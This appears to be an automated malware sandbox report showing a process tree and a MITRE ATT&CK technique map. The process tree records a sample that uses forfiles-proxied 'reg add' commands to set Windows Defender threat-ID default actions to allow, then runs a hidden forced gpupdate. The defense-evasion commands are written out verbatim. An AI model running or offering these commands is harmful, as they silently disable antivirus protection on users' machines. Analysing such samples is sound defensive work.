"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:3920

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:948

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:2328

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:5912

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:5836

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:6544

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:6576

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:1712

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:4316

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:6580

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:6056

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:4216

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:6704

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:6188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:5524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion